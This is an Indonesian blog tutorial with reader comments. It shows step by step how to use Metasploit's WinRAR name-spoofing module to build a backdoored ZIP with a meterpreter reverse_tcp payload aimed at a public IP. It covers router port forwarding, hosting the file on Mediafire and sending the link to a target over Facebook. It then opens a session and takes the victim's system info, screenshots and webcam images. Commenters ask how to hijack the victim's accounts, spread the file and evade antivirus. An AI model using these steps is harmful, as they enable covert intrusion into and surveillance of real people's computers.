Sebelumnya saya ucapkan selamat tahun baru 2016, semoga ini menjadi lembaran baru yang lebih baik, semoga lebih maju dan sukses untuk kita semua. di awal tahun ini saya masih membahas tentang metasploit, saya akan memberikan tutorial tentang cara Exploit Windows Menggunakan Winrar, oke langsung saja di simak langkah-langkahnya

pertama kita jalankan service porsgresql dan metasploit terlebih dahulu
service postgresql start
service metaploit start
service mwtasploit start

selanjutnya buka msfconsole
msfconsole
Exploit Windows Menggunakan Winrar dengan Metasploit (Beda Jaringan)

Setelah msfconsole terbuka kita buat backdor dengan format .zip, ikutin saja perintahnya
use exploit/windows/fileformat/winrar_name_spoofing
set payload windows/meterpreter/reverse_tcp
set filename Template_Anherr.zip
set spoof template.txt
set lhost 36.70.XXX.XXX
exploit
use exploit/windows/fileformat/winrar_name_spoofing

Keterangan:
Temmplate_Anherr.zip >> Nama File backdor yang di buat (saya ilustrasikan ini merupakan template blog)
Template.txt >> isi dari Temmplate_Anherr.zip
36.70.XXX.XXX >> Ip Public
kenapa saya lhostnya menggunakan ip public, ya karena target yang akan di exploit kali ini adalah berbeda jaringan. jangan lupa jika menggunakan ip  public kalian harus setting port foward pada router. ceklist pada DMZ Enabled
Setting DMZ router

Selanjutnya kita ambil backdoor tadi di folder /root/.msf4/local/ Kemudian upload , disini saya uplod di mediafire, kalian juga bisa coba tempat upload file yang lain.

upload mediafire

mediafire

oke setelah pembuatan backdoor selesai dan di upload, kita jalankan perintah exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.06
exploit
use exploit/multi/handler

Catatan: untuk lhost isikan ip local
setelah itu kita berikan backdoor tersebut ke target, berikan link yang buat download backdoor tadi ke target :D
kirim fb

Kita tunggu dulu broo, sampai targett download dan membuka file backdoor tadi
dan taraaa...!! ternyata exploit berhasil, meterpreter session opened :v

Meterpreter sessions 1 opened

Saya coba cek informasi sytem korban
sysinfo

Selanjutnya saya coba ambil screenshot laptop korban , dan coba capture wbcam korban

sysinfo

ini hasilnya
screenshot victim

Bubun Galau

sepertinya dia lagi galau broo,wkwkw
udah segitu aja percobaan kali ini
ini hanya untuk pembelajaran semata, target saya disini adalah temen saya sendiri, sebelumnya saya sudah meminta dan sudah di beri izin untuk melakuakn percobaan ini. penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya.
oke sekian tutorial  mengenai cara Exploit Windows Menggunakan Winrar dengan Metasploit semoga bermanfaat bagi kita semua.

Posting Komentar

  1. anjay foto gau di tempel . =))

    BalasHapus
  2. itu backdornya cuma di download aja?

    BalasHapus
    Balasan
    1. iya terus d buka pake winrar bro, kita bisa masuk meterpreter kalo target buka file yg ada d dalam winrar tersebut

      Hapus
  3. gan kok gini root@Knuckleman:~# service metasploit start
    Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.

    BalasHapus
    Balasan
    1. untuk kali linux 2 cara menjalankan metasploit memang sdikit berbeda mas, pke perintah ini
      /etc/init.d/postgresql start
      msfdb init
      msfconsole

      Hapus
  4. posisi backdoor udah nyangkut gan, mau nanya, apa ada perintah untuk eksekusi browser korban? biar bisa ambil alih akun2 nya gitu :D

    BalasHapus
  5. Korban udah buka backdoor tapi di terminal gak ada session apa pun .?
    udah set PORT Forwading seperti di tutor kira kira salah apanya.?

    BalasHapus
  6. bahaya nih kalau download aplikasi diblog ini, bisa* kena hack nantinya

    BalasHapus
  7. kalo misalkan kita sebar ke blog atau website lain apakah bisa work backdoor ini

    BalasHapus
  8. om lihat settingan routernya dong, kenapa ane gagal mulu ya

    BalasHapus
  9. kalau wifi nya fiberhome gmna liat dmz nya

    BalasHapus
  10. 1. Ini sih cuman bisa di tes kalo dirumah pribadi pasang internet wifi ni, soalnya pake setting2 router segala. Kalau kita lagi di cafe gimana gan ? Secara kan kita ga bisa ngakses atau setting router cafe tsb.

    2. Backdoornya terlalu sederhana gan, kira2 backdoor yg begitu doang bisa tembus av ga ? Ntar pas di donlod korban langsung dihapus av laptop korban pula ntu backdoor

    BalasHapus

 
Top